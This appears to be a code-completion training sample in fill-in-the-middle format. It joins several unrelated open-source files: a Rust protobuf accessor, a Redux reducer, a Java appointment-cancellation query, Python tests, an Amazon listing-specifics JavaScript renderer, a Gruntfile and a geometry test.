fns: FieldAccessorFunctions::Repeated(RepeatedGet::String(get)),
})
}
pub fn make_repeated_bytes_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [Vec<u8>],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Bytes(get)),
})
}
pub fn make_repeated_enum_accessor<M : Message + 'static, E : ProtobufEnum + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [E],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Enum(
Box::new(GetRepeatedEnumImpl { get: get }),
)),
})
}
pub fn make_repeated_message_accessor<M : Message + 'static, F : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [F],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Message(
Box::new(GetRepeatedMessageImpl { get: get }),
)),
})
}<|fim▁end|> | fns: FieldAccessorFunctions::Repeated(RepeatedGet::F64(get)),
})
} |
<|file_name|>game.js<|end_file_name|><|fim▁begin|><|fim▁hole|>import { combineReducers } from 'redux-immutable';
import gluttonousSnake from 'isomerism/reducers/components/game/gluttonousSnake';
export default combineReducers({
gluttonousSnake,
});<|fim▁end|> | |
<|file_name|>ReasonTextDialogImpl.java<|end_file_name|><|fim▁begin|>//#############################################################################
//# #
//# Copyright (C) <2015> <IMS MAXIMS> #
//# #
//# This program is free software: you can redistribute it and/or modify #
//# it under the terms of the GNU Affero General Public License as #
//# published by the Free Software Foundation, either version 3 of the #
//# License, or (at your option) any later version. #
//# #
//# This program is distributed in the hope that it will be useful, #
//# but WITHOUT ANY WARRANTY; without even the implied warranty of #
//# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
//# GNU Affero General Public License for more details. #
//# #
//# You should have received a copy of the GNU Affero General Public License #
//# along with this program. If not, see <http://www.gnu.org/licenses/>. #
//# #
//# IMS MAXIMS provides absolutely NO GUARANTEE OF THE CLINICAL SAFTEY of #
//# this program. Users of this software do so entirely at their own risk. #
//# IMS MAXIMS only ensures the Clinical Safety of unaltered run-time #
//# software that it builds, deploys and maintains. #
//# #
//#############################################################################
//#EOH
// This code was generated by Silviu Checherita using IMS Development Environment (version 1.80 build 5567.19951)
// Copyright (C) 1995-2015 IMS MAXIMS. All rights reserved.
package ims.scheduling.domain.impl;
import java.util.ArrayList;
import java.util.List;
import ims.domain.DomainFactory;
import ims.domain.lookups.LookupInstance;
import ims.scheduling.domain.base.impl.BaseReasonTextDialogImpl;
import ims.scheduling.vo.lookups.CancelAppointmentReason;
import ims.scheduling.vo.lookups.CancelAppointmentReasonCollection;
import ims.scheduling.vo.lookups.Status_Reason;
public class ReasonTextDialogImpl extends BaseReasonTextDialogImpl
{
private static final long serialVersionUID = 1L;
//WDEV-21736
public CancelAppointmentReasonCollection listReasons()
{
DomainFactory factory = getDomainFactory();
<|fim▁hole|> String hql = "SELECT r FROM CancellationTypeReason AS t LEFT JOIN t.cancellationReason as r WHERE t.cancellationType.id = :cancellationType AND r.active = 1";
markers.add("cancellationType");
values.add(Status_Reason.HOSPITALCANCELLED.getID());
List results = factory.find(hql.toString(), markers,values);
if (results == null)
return null;
CancelAppointmentReasonCollection col = new CancelAppointmentReasonCollection();
for (int i=0; i<results.size(); i++)
{
CancelAppointmentReason reason = new CancelAppointmentReason(((LookupInstance) results.get(i)).getId(), ((LookupInstance) results.get(i)).getText(), ((LookupInstance) results.get(i)).isActive());
col.add(reason);
}
return col;
}
//WDEV-21736 ends here
}<|fim▁end|> | ArrayList markers = new ArrayList();
ArrayList values = new ArrayList();
|
<|file_name|>test_get_neighborhoods.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""
PURPOSE: The routines in this file test the get_neighborhoods module.
Created on 2015-04-02T21:24:17
"""
from __future__ import division, print_function
#import numpy as np
#from types import *
#from nose.tools import raises
#import pandas as pd
import nhrc2.backend.read_seeclickfix_api_to_csv as rscf
from nhrc2.backend import get_neighborhoods as get_ngbrhd
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "[email protected]"
__status__ = " Development NOT(Prototype or Production)"
<|fim▁hole|> """
Ensure the number in the hood list length = the number of issues
"""
scf_cats = rscf.read_categories(readfile=True)
issues = rscf.read_issues(scf_cats, readfile=True)
hoods = get_ngbrhd.get_neighborhoods()
assert len(issues) == len(hoods)
#@raises(ValueError)
#def test_make_function_raise_value_error():<|fim▁end|> |
#make sure the number of neighborhoods is equal to the number of issues.
def test_get_neighborhoods(): |
<|file_name|>RowRenderer.js<|end_file_name|><|fim▁begin|><|fim▁hole|>
attributeHandler: null,
// ---------------------------------------
process: function()
{
if (this.specificHandler.isSpecificRendered(this.indexedXPath) && !this.isValueForceSet()) {
return '';
}
if (!this.load()) {
return '';
}
this.renderParentSpecific();
if (this.specificHandler.isSpecificRendered(this.indexedXPath) && !this.isValueForceSet()) {
return '';
}
if (this.specificHandler.isSpecificRendered(this.indexedXPath)) {
if (this.isValueForceSet()) {
this.forceSelectAndDisable(this.getForceSetValue());
this.hideButton($(this.indexedXPath + '_remove_button'));
var myEvent = new CustomEvent('undeleteble-specific-appear');
$(this.getParentIndexedXpath()).dispatchEvent(myEvent);
}
return '';
}
this.renderSelf();
if (this.isValueForceSet()) {
this.forceSelectAndDisable(this.getForceSetValue());
}
this.observeToolTips(this.indexedXPath);
this.checkSelection();
this.renderSpecificAttributes();
},
// ---------------------------------------
load: function($super)
{
this.attributeHandler = AttributeHandlerObj;
return $super();
},
//########################################
renderParentSpecific: function()
{
if (this.specific.parent_specific_id == null) {
return '';
}
if (!this.dictionaryHelper.isSpecificTypeContainer(this.parentSpecific)) {
return '';
}
var parentBlockRenderer = new AmazonTemplateDescriptionCategorySpecificBlockRenderer();
parentBlockRenderer.setSpecificsHandler(this.specificHandler);
parentBlockRenderer.setIndexedXpath(this.getParentIndexedXpath());
parentBlockRenderer.process();
},
renderSelf: function()
{
this.renderLabel();
this.renderChooseMode();
this.renderValueInputs();
// affects the appearance of the actions buttons
this.specificHandler.markSpecificAsRendered(this.indexedXPath);
this.renderButtons();
// ---------------------------------------
$(this.indexedXPath).observe('my-duplicate-is-rendered', this.onMyDuplicateRendered.bind(this));
// ---------------------------------------
// like grid visibility or view of 'Add Specific' container
this.throwEventsToParents();
},
renderSpecificAttributes: function()
{
var self = this;
if (!this.specific.params.hasOwnProperty('attributes')) {
return '';
}
this.specific.params.attributes.each(function(attribute, index) {
var renderer = new AmazonTemplateDescriptionCategorySpecificGridRowAttributeRenderer();
renderer.setSpecificsHandler(self.specificHandler);
renderer.setIndexedXpath(self.indexedXPath);
renderer.attribute = attribute;
renderer.attributeIndex = index;
renderer.process();
});
},
//########################################
renderLabel: function()
{
var td = new Element('td');
var title = this.specific.title;
if (this.dictionaryHelper.isSpecificRequired(this.specific) || this.isValueForceSet()) {
title += ' <span class="required">*</span>';
} else if (this.dictionaryHelper.isSpecificDesired(this.specific)) {
title += ' <span style="color: grey; font-style: italic;">(' + M2ePro.translator.translate('Desired') + ')</span>';
}
td.appendChild((new Element('span').insert(title)));
var note = this.getDefinitionNote(this.specific.data_definition);
if (note) {
var toolTip = this.getToolTipBlock(this.indexedXPath + '_definition_note', note);
toolTip.show();
td.appendChild(toolTip);
}
var notice = this.getSpecificOverriddenNotice();
if (notice) td.appendChild(notice);
notice = this.getSpecificParentageNotice();
if (notice) td.appendChild(notice);
this.getRowContainer().appendChild(td);
},
// ---------------------------------------
renderChooseMode: function()
{
var select = new Element('select', {
'id' : this.indexedXPath +'_mode',
'indexedxpath': this.indexedXPath,
'class' : 'M2ePro-required-when-visible',
'style' : 'width: 93.2%;'
});
select.appendChild(new Element('option', {'style': 'display: none'}));
if (this.specific.recommended_values.length > 0) {
select.appendChild(new Element('option', {'value': this.MODE_RECOMMENDED_VALUE}))
.insert(M2ePro.translator.translate('Recommended Values'));
}
select.appendChild(new Element('option', {'value': this.MODE_CUSTOM_VALUE}))
.insert(M2ePro.translator.translate('Custom Value'));
select.appendChild(new Element('option', {'value': this.MODE_CUSTOM_ATTRIBUTE}))
.insert(M2ePro.translator.translate('Custom Attribute'));
select.observe('change', this.onChangeChooseMode.bind(this));
this.getRowContainer().appendChild(new Element('td')).appendChild(select);
},
onChangeChooseMode: function(event)
{
var customValue = $(this.indexedXPath + '_' + this.MODE_CUSTOM_VALUE),
customValueNote = $(this.indexedXPath + '_custom_value_note'),
customValueNoteError = $('advice-M2ePro-specifics-validation-' + customValue.id);
var customAttribute = $(this.indexedXPath + '_' + this.MODE_CUSTOM_ATTRIBUTE),
customAttributeNote = $(this.indexedXPath + '_custom_attribute_note'),
customAttributeError = $('advice-M2ePro-required-when-visible-' + customAttribute.id);
var recommendedValue = $(this.indexedXPath + '_' + this.MODE_RECOMMENDED_VALUE);
customValue && customValue.hide();
customValueNote && customValueNote.hide();
customValueNoteError && customValueNoteError.hide();
customAttribute && customAttribute.hide();
customAttributeNote && customAttributeNote.hide();
customAttributeError && customAttributeError.hide();
recommendedValue && recommendedValue.hide();
if (event.target.value == this.MODE_CUSTOM_VALUE) {
customValue && customValue.show();
customValueNote && customValueNote.show();
customValueNoteError && customValueNoteError.show();
}
if (event.target.value == this.MODE_CUSTOM_ATTRIBUTE) {
customAttribute && customAttribute.show();
customAttributeNote && customAttributeNote.show();
customAttributeError && customAttributeError.show();
}
if (event.target.value == this.MODE_RECOMMENDED_VALUE) {
recommendedValue && recommendedValue.show();
}
},
// ---------------------------------------
renderValueInputs: function()
{
var td = this.getRowContainer().appendChild(new Element('td'));
// ---------------------------------------
if (this.dictionaryHelper.isSpecificTypeText(this.specific)) {
var note = this.getCustomValueTypeNote();
if (note) td.appendChild(this.getToolTipBlock(this.indexedXPath + '_custom_value_note', note));
td.appendChild(this.getTextTypeInput());
}
if (this.dictionaryHelper.isSpecificTypeSelect(this.specific)) {
td.appendChild(this.getSelectTypeInput());
}
// ---------------------------------------
// ---------------------------------------
note = this.getCustomAttributeTypeNote();
if (note) td.appendChild(this.getToolTipBlock(this.indexedXPath + '_custom_attribute_note', note));
td.appendChild(this.getCustomAttributeSelect());
// ---------------------------------------
td.appendChild(this.getRecommendedValuesSelect());
},
// ---------------------------------------
getTextTypeInput: function()
{
if (this.dictionaryHelper.isSpecificTypeTextArea(this.specific)) {
var input = new Element('textarea', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE,
'indexedxpath' : this.indexedXPath,
'specific_id' : this.specific.specific_id,
'specific_type' : this.specific.params.type,
'mode' : this.MODE_CUSTOM_VALUE,
'class' : 'M2ePro-required-when-visible M2ePro-specifics-validation',
'style' : 'width: 91.4%; display: none;'
});
} else {
var input = new Element('input', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE,
'indexedxpath' : this.indexedXPath,
'specific_id' : this.specific.specific_id,
'mode' : this.MODE_CUSTOM_VALUE,
'specific_type' : this.specific.params.type,
'type' : 'text',
'class' : 'input-text M2ePro-required-when-visible M2ePro-specifics-validation',
'style' : 'display: none; width: 91.4%;'
});
this.specific.params.type == 'date_time' && Calendar.setup({
'inputField': input,
'ifFormat': "%Y-%m-%d %H:%M:%S",
'showsTime': true,
'button': input,
'align': 'Bl',
'singleClick': true
});
this.specific.params.type == 'date' && Calendar.setup({
'inputField': input,
'ifFormat': "%Y-%m-%d",
'showsTime': true,
'button': input,
'align': 'Bl',
'singleClick': true
});
}
input.observe('change', this.onChangeValue.bind(this));
return input;
},
getSelectTypeInput: function()
{
var self = this;
var select = new Element('select', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE,
'indexedxpath': this.indexedXPath,
'specific_id' : this.specific.specific_id,
'mode' : this.MODE_CUSTOM_VALUE,
'class' : 'M2ePro-required-when-visible',
'style' : 'display: none; width: 93.2%;'
});
select.appendChild(new Element('option', {'style': 'display: none;'}));
var specificOptions = this.specific.values;
specificOptions.each(function(option) {
var label = option == 'true' ? 'Yes' : (option == 'false' ? 'No' : option),
tempOption = new Element('option', {'value': option});
select.appendChild(tempOption).insert(label);
});
select.observe('change', this.onChangeValue.bind(this));
return select;
},
getCustomAttributeSelect: function()
{
var select = new Element('select', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_ATTRIBUTE,
'indexedxpath' : this.indexedXPath,
'specific_id' : this.specific.specific_id,
'specific_type' : this.specific.params.type,
'mode' : this.MODE_CUSTOM_ATTRIBUTE,
'class' : 'attributes M2ePro-required-when-visible',
'style' : 'display: none; width: 93.2%;',
'apply_to_all_attribute_sets' : '0'
});
select.appendChild(new Element('option', {'style': 'display: none', 'value': ''}));
this.attributeHandler.availableAttributes.each(function(el) {
select.appendChild(new Element('option', {'value': el.code})).insert(el.label);
});
select.value = '';
select.observe('change', this.onChangeValue.bind(this));
var handlerObj = new AttributeCreator(select.id);
handlerObj.setSelectObj(select);
handlerObj.injectAddOption();
return select;
},
getRecommendedValuesSelect: function()
{
var select = new Element('select', {
'id' : this.indexedXPath +'_'+ this.MODE_RECOMMENDED_VALUE,
'indexedxpath': this.indexedXPath,
'specific_id' : this.specific.specific_id,
'mode' : this.MODE_RECOMMENDED_VALUE,
'class' : 'M2ePro-required-when-visible',
'style' : 'display: none; width: 93.2%;'
});
select.appendChild(new Element('option', {'style': 'display: none', 'value': ''}));
this.specific.recommended_values.each(function(value) {
select.appendChild(new Element('option', {'value': value})).insert(value);
});
select.value = '';
select.observe('change', this.onChangeValue.bind(this));
return select;
},
onChangeValue: function(event)
{
var selectedObj = {};
selectedObj['mode'] = event.target.getAttribute('mode');
selectedObj['type'] = event.target.getAttribute('specific_type');
selectedObj['is_required'] = (this.dictionaryHelper.isSpecificRequired(this.specific) || this.isValueForceSet()) ? 1 : 0;
selectedObj[selectedObj.mode] = event.target.value;
this.specificHandler.markSpecificAsSelected(this.indexedXPath, selectedObj);
},
// ---------------------------------------
renderButtons: function()
{
var td = this.getRowContainer().appendChild(new Element('td'));
var cloneButton = this.getCloneButton();
if(cloneButton !== null) td.appendChild(cloneButton);
var removeButton = this.getRemoveButton();
if(removeButton !== null) td.appendChild(removeButton);
},
// ---------------------------------------
throwEventsToParents: function()
{
var myEvent,
parentXpath;
// ---------------------------------------
myEvent = new CustomEvent('child-specific-rendered');
parentXpath = this.getParentIndexedXpath();
$(parentXpath + '_grid').dispatchEvent(myEvent);
$(parentXpath + '_add_row').dispatchEvent(myEvent);
// ---------------------------------------
// my duplicate is already rendered
this.touchMyNeighbors();
// ---------------------------------------
// ---------------------------------------
if (this.isValueForceSet()) {
this.hideButton($(this.indexedXPath + '_remove_button'));
myEvent = new CustomEvent('undeleteble-specific-appear');
$(this.getParentIndexedXpath()).dispatchEvent(myEvent);
}
// ---------------------------------------
},
//########################################
checkSelection: function()
{
if (this.specific.values.length == 1) {
this.forceSelectAndDisable(this.specific.values[0]);
return '';
}
if (!this.specificHandler.isMarkedAsSelected(this.indexedXPath) &&
!this.specificHandler.isInFormData(this.indexedXPath)) {
return '';
}
var selectionInfo = this.specificHandler.getSelectionInfo(this.indexedXPath);
var id = this.indexedXPath + '_mode';
$(id).value = selectionInfo.mode;
this.simulateAction($(id), 'change');
if (selectionInfo.mode == this.MODE_CUSTOM_VALUE) {
id = this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE;
$(id).value = selectionInfo['custom_value'];
this.simulateAction($(id), 'change');
}
if (selectionInfo.mode == this.MODE_CUSTOM_ATTRIBUTE) {
id = this.indexedXPath +'_'+ this.MODE_CUSTOM_ATTRIBUTE;
$(id).value = selectionInfo['custom_attribute'];
this.simulateAction($(id), 'change');
}
if (selectionInfo.mode == this.MODE_RECOMMENDED_VALUE) {
id = this.indexedXPath +'_'+ this.MODE_RECOMMENDED_VALUE;
$(id).value = selectionInfo['recommended_value'];
this.simulateAction($(id), 'change');
}
},
forceSelectAndDisable: function(value)
{
if (!value) {
return;
}
var modeSelect = $(this.indexedXPath + '_mode');
modeSelect.value = this.MODE_CUSTOM_VALUE;
this.simulateAction(modeSelect, 'change');
modeSelect.setAttribute('disabled','disabled');
var valueObj = $(this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE);
valueObj.value = value;
this.simulateAction(valueObj, 'change');
valueObj.setAttribute('disabled', 'disabled');
},
//########################################
getToolTipBlock: function(id, messageHtml)
{
var container = new Element('div', {
'id' : id,
'style': 'float: right; display: none;'
});
container.appendChild(new Element('img', {
'src' : M2ePro.url.get('m2epro_skin_url') + '/images/tool-tip-icon.png',
'class' : 'tool-tip-image'
}));
var htmlCont = container.appendChild(new Element('span', {
'class' : 'tool-tip-message tip-left',
'style' : 'display: none; max-width: 500px;'
}));
htmlCont.appendChild(new Element('img', {
'src': M2ePro.url.get('m2epro_skin_url') + '/images/help.png'
}));
htmlCont.appendChild(new Element('span')).insert(messageHtml);
return container;
},
// ---------------------------------------
getCustomValueTypeNote: function()
{
if (this.specific.data_definition.definition) {
return null;
}
if (this.specific.params.type == 'int') return this.getIntTypeNote(this.specific.params);
if (this.specific.params.type == 'float') return this.getFloatTypeNote(this.specific.params);
if (this.specific.params.type == 'string') return this.getStringTypeNote(this.specific.params);
if (this.specific.params.type == 'date_time') return this.getDatTimeTypeNote(this.specific.params);
return this.getAnyTypeNote(this.specific.params);
},
getIntTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function() {
notes[0] = M2ePro.translator.translate('Type: Numeric.') + ' ';
},
'min_value': function(restriction) {
notes[1] = M2ePro.translator.translate('Min:') + ' ' + restriction + '. ';
},
'max_value': function(restriction) {
notes[2] = M2ePro.translator.translate('Max:') + ' ' + restriction + '. ';
},
'total_digits': function(restriction) {
notes[3] = M2ePro.translator.translate('Total digits (not more):') + ' ' + restriction + '. ';
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getFloatTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function() {
notes[0] = M2ePro.translator.translate('Type: Numeric floating point.') + ' ';
},
'min_value': function(restriction) {
notes[1] = M2ePro.translator.translate('Min:') + ' ' + restriction + '. ';
},
'max_value': function(restriction) {
notes[2] = M2ePro.translator.translate('Max:') + ' ' + restriction + '. ';
},
'decimal_places': function(restriction) {
notes[3] = M2ePro.translator.translate('Decimal places (not more):') + ' ' + restriction.value + '. ';
},
'total_digits': function(restriction) {
notes[4] = M2ePro.translator.translate('Total digits (not more):') + ' ' + restriction + '. ';
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getStringTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function() {
notes[0] = M2ePro.translator.translate('Type: String.') + ' ';
},
'min_length': function(restriction) {
notes[1] = restriction != 1 ? M2ePro.translator.translate('Min length:') + ' ' + restriction : '';
},
'max_length': function(restriction) {
notes[2] = M2ePro.translator.translate('Max length:') + ' ' + restriction;
},
'pattern': function(restriction) {
if (restriction == '[a-zA-Z][a-zA-Z]|unknown') {
notes[3] = M2ePro.translator.translate('Two uppercase letters or "unknown".');
}
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getDatTimeTypeNote: function(params)
{
var notes = [];
var handler = {
'type': function(restriction) {
notes.push(M2ePro.translator.translate('Type: Date time. Format: YYYY-MM-DD hh:mm:ss'));
}
};
for (var paramName in params) {
params.hasOwnProperty(paramName) && handler[paramName] && handler[paramName](params[paramName]);
}
return notes.join('');
},
getAnyTypeNote: function(params)
{
return M2ePro.translator.translate('Can take any value.');
},
// ---------------------------------------
getCustomAttributeTypeNote: function()
{
if (this.specific.values.length <= 0 && this.specific.recommended_values.length <= 0) {
return null;
}
var span = new Element('span');
var title = this.specific.values.length > 0 ? M2ePro.translator.translate('Allowed Values') : M2ePro.translator.translate('Recommended Values');
span.appendChild(new Element('span')).insert('<b>' + title + ': </b>');
var ul = span.appendChild(new Element('ul'));
var noteValues = this.specific.values.length > 0 ? this.specific.values : this.specific.recommended_values;
noteValues.each(function(value) {
ul.appendChild(new Element('li')).insert(value);
});
return span.outerHTML;
},
// ---------------------------------------
getDefinitionNote: function(definitionPart)
{
if (!definitionPart.definition) {
return;
}
var div = new Element('div');
div.appendChild(new Element('div', {style: 'padding: 2px 0; margin-top: 5px;'}))
.insert('<b>' + M2ePro.translator.translate('Definition:') + '</b>');
div.appendChild(new Element('div'))
.insert(definitionPart.definition);
if (definitionPart.tips && definitionPart.tips.match(/[a-z0-9]/i)) {
div.appendChild(new Element('div', {style: 'padding: 2px 0; margin-top: 5px;'}))
.insert('<b>' + M2ePro.translator.translate('Tips:') + '</b>');
div.appendChild(new Element('div'))
.insert(definitionPart.tips);
}
if (definitionPart.example && definitionPart.example.match(/[a-z0-9]/i)) {
div.appendChild(new Element('div', {style: 'padding: 2px 0; margin-top: 5px;'}))
.insert('<b>' + M2ePro.translator.translate('Examples:') + '</b>');
div.appendChild(new Element('div'))
.insert(definitionPart.example);
}
return div.outerHTML;
},
// ---------------------------------------
getSpecificOverriddenNotice: function()
{
if (!this.specificHandler.canSpecificBeOverwrittenByVariationTheme(this.specific)) {
return null;
}
var variationThemesList = this.specificHandler.themeAttributes[this.specific.xml_tag];
var message = '<b>' + M2ePro.translator.translate('Value of this Specific can be automatically overwritten by M2E Pro.') + '</b>';
message += '<br/><br/>' + variationThemesList.join(', ');
return this.constructNotice(message);
},
getSpecificParentageNotice: function()
{
if (this.specific.xml_tag != 'Parentage') {
return null;
}
return this.constructNotice(M2ePro.translator.translate('Amazon Parentage Specific will be overridden notice.'));
},
constructNotice: function(message)
{
var container = new Element('div', {
'style': 'float: right; margin-right: 3px; margin-top: 1px;'
});
container.appendChild(new Element('img', {
'src' : M2ePro.url.get('m2epro_skin_url') + '/images/warning.png',
'class' : 'tool-tip-image'
}));
var htmlCont = container.appendChild(new Element('span', {
'class' : 'tool-tip-message tip-left',
'style' : 'display: none; max-width: 500px; border-color: #ffd967; background-color: #fffbf0;'
}));
htmlCont.appendChild(new Element('img', {
'src' : M2ePro.url.get('m2epro_skin_url') + '/images/i_notice.gif',
'style' : 'margin-top: -21px;'
}));
htmlCont.appendChild(new Element('span')).insert(message);
return container;
},
//########################################
observeToolTips: function(indexedXpath)
{
$$('tr[id="' + indexedXpath + '"] .tool-tip-image').each(function(element) {
element.observe('mouseover', MagentoFieldTipObj.showToolTip);
element.observe('mouseout', MagentoFieldTipObj.onToolTipIconMouseLeave);
});
$$('tr[id="' + indexedXpath + '"] .tool-tip-message').each(function(element) {
element.observe('mouseout', MagentoFieldTipObj.onToolTipMouseLeave);
element.observe('mouseover', MagentoFieldTipObj.onToolTipMouseEnter);
});
},
//########################################
removeAction: function($super, event)
{
// for attributes removing
var myEvent = new CustomEvent('parent-specific-row-is-removed');
$(this.indexedXPath).dispatchEvent(myEvent);
// ---------------------------------------
var deleteResult = $super(event);
this.throwEventsToParents();
return deleteResult;
},
cloneAction: function($super, event)
{
var newIndexedXpath = $super(event);
this.observeToolTips(newIndexedXpath);
var myEvent = new CustomEvent('parent-specific-row-is-cloned', { 'new_indexed_xpath': newIndexedXpath });
$(this.indexedXPath).dispatchEvent(myEvent);
return newIndexedXpath;
},
// ---------------------------------------
getRowContainer: function()
{
if ($(this.indexedXPath)) {
return $(this.indexedXPath);
}
var grid = $$('table[id="'+ this.getParentIndexedXpath() +'_grid"] table.border tbody').first();
return grid.appendChild(new Element('tr', {id: this.indexedXPath}));
}
// ---------------------------------------
});<|fim▁end|> | AmazonTemplateDescriptionCategorySpecificGridRowRenderer = Class.create(AmazonTemplateDescriptionCategorySpecificRenderer, {
// ---------------------------------------
|
<|file_name|>Gruntfile.js<|end_file_name|><|fim▁begin|>module.exports = function ( grunt ) {
grunt.initConfig( {
pkg: grunt.file.readJSON( 'package.json' ),
banner: '/*!\n' +
'* <%= pkg.name %> v<%= pkg.version %> - <%= pkg.description %>\n' +
'* Copyright (c) <%= grunt.template.today(\'yyyy\') %> <%= pkg.author %>. All rights reserved.\n' +
'* Licensed under <%= pkg.license %> License.\n' +
'*/',
connect: {
docs: {
options: {
protocol: 'http',
port: 8080,
hostname: 'localhost',
livereload: true,
base: {
path: 'docs/',
options: {
index: 'index.htm'
}
},
open: 'http://localhost:8080/index.htm'
}
}
},
sass: {
docs: {
options: {
style: 'expanded'
},
files: {
'dist/autoc.css': 'src/sass/autoc.scss',
'docs/css/layout.css': 'sass/layout.scss'
}
}
},
csslint: {
docs: {
options: {
'bulletproof-font-face': false,
'order-alphabetical': false,
'box-model': false,
'vendor-prefix': false,
'known-properties': false
},
src: [
'dist/autoc.css',
'docs/css/layout.css'
]
}
},
cssmin: {
dist: {
files: {
'dist/autoc.min.css': [
'dist/autoc.css'
]
}
},
docs: {
files: {
'docs/css/layout.min.css': [
'node_modules/normalize.css/normalize.css',
'docs/css/layout.css',
'dist/autoc.css'
]
}
}
},
jshint: {
src: {
options: {
jshintrc: '.jshintrc'<|fim▁hole|> },
src: [
'src/**/*.js'
],
filter: 'isFile'
}
},
uglify: {
options: {
banner: '<%= banner %>'
},
docs: {
files: {
'docs/js/autoc.min.js': [
'src/autoc.js'
]
}
},
dist: {
files: {
'dist/autoc.min.js': [
'src/autoc.js'
]
}
}
},
copy: {
docs: {
files: [
{
'docs/js/jquery.js': 'node_modules/jquery/dist/jquery.js'
}
]
},
dist: {
files: [
{
'dist/autoc.js': 'src/autoc.js'
}
]
}
},
pug: {
docs: {
options: {
pretty: true,
data: {
debug: true
}
},
files: {
// create api home page
'docs/index.htm': 'pug/api/index.pug'
}
}
},
watch: {
css: {
files: [
'sass/**/**.scss'
],
tasks: [
'sass',
'csslint',
'cssmin'
]
},
js: {
files: [
'src/**/*.js'
],
tasks: [
'jshint:src',
'uglify',
'copy:docs'
]
},
pug: {
files: [
'pug/**/**.pug'
],
tasks: [
'pug:docs'
]
},
docs: {
files: [
'docs/**/**.html',
'docs/**/**.js',
'docs/**/**.css'
],
options: {
livereload: true
}
}
}
} );
grunt.loadNpmTasks( 'grunt-contrib-connect' );
grunt.loadNpmTasks( 'grunt-contrib-copy' );
grunt.loadNpmTasks( 'grunt-contrib-sass' );
grunt.loadNpmTasks( 'grunt-contrib-csslint' );
grunt.loadNpmTasks( 'grunt-contrib-cssmin' );
grunt.loadNpmTasks( 'grunt-contrib-jshint' );
grunt.loadNpmTasks( 'grunt-contrib-uglify' );
grunt.loadNpmTasks( 'grunt-contrib-pug' );
grunt.loadNpmTasks( 'grunt-contrib-watch' );
grunt.registerTask( 'html', [ 'pug' ] );
grunt.registerTask( 'http', [
'connect:docs',
'watch'
] );
grunt.registerTask( 'hint', [ 'jshint:src' ] );
grunt.registerTask( 'scripts', [
'jshint',
'uglify',
'copy'
] );
grunt.registerTask( 'styles', [
'sass',
'csslint',
'cssmin'
] );
grunt.registerTask( 'default', [
'connect:docs',
'sass',
'csslint',
'cssmin',
'jshint:src',
'uglify',
'copy',
'pug',
'watch'
] );
};<|fim▁end|> | |
<|file_name|>test_110_polygons.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Mathmaker creates automatically maths exercises sheets
# with their answers
# Copyright 2006-2017 Nicolas Hainaux <[email protected]>
# This file is part of Mathmaker.
# Mathmaker is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
# Mathmaker is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Mathmaker; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import pytest
from mathmaker.lib.core.root_calculus import Value
from mathmaker.lib.core.base_geometry import Point
from mathmaker.lib.core.geometry import Polygon
@pytest.fixture
def p1():
p1 = Polygon([Point('A', 0.5, 0.5),
Point('B', 3, 1),
Point('C', 3.2, 4),
Point('D', 0.8, 3)
])
p1.side[0].label = Value(4, unit='cm')
p1.side[1].label = Value(3, unit='cm')
p1.side[2].label = Value(2, unit='cm')
p1.side[3].label = Value(6.5, unit='cm')
p1.angle[0].label = Value(64, unit="\\textdegree")
p1.angle[1].label = Value(128, unit="\\textdegree")
p1.angle[2].label = Value(32, unit="\\textdegree")
p1.angle[3].label = Value(256, unit="\\textdegree")
p1.angle[0].mark = 'simple'
p1.angle[1].mark = 'simple'
p1.angle[2].mark = 'simple'
p1.angle[3].mark = 'simple'
return p1
def test_p1_into_euk(p1):
"""Check Polygon's generated euk file."""
assert p1.into_euk() == \
'box -0.1, -0.1, 3.8, 4.6\n\n'\
'A = point(0.5, 0.5)\n'\
'B = point(3, 1)\n'\
'C = point(3.2, 4)\n'\
'D = point(0.8, 3)\n'\
'\n'\
'draw\n'\
' (A.B.C.D)\n'\
' $\\rotatebox{11}{\sffamily 4~cm}$ A 11 - 12.7 deg 4.1\n'\
' $\\rotatebox{86}{\sffamily 3~cm}$ B 86 - 8.9 deg 4.9\n'\
' $\\rotatebox{23}{\sffamily 2~cm}$ C 203 - 12.2 deg 4.2\n'\
' $\\rotatebox{83}{\sffamily 6.5~cm}$ D 263 - 12.9 deg 4.1\n'\
' $\\rotatebox{47.3}{\sffamily 64\\textdegree}$ A 47.3 deg 2.7\n'\
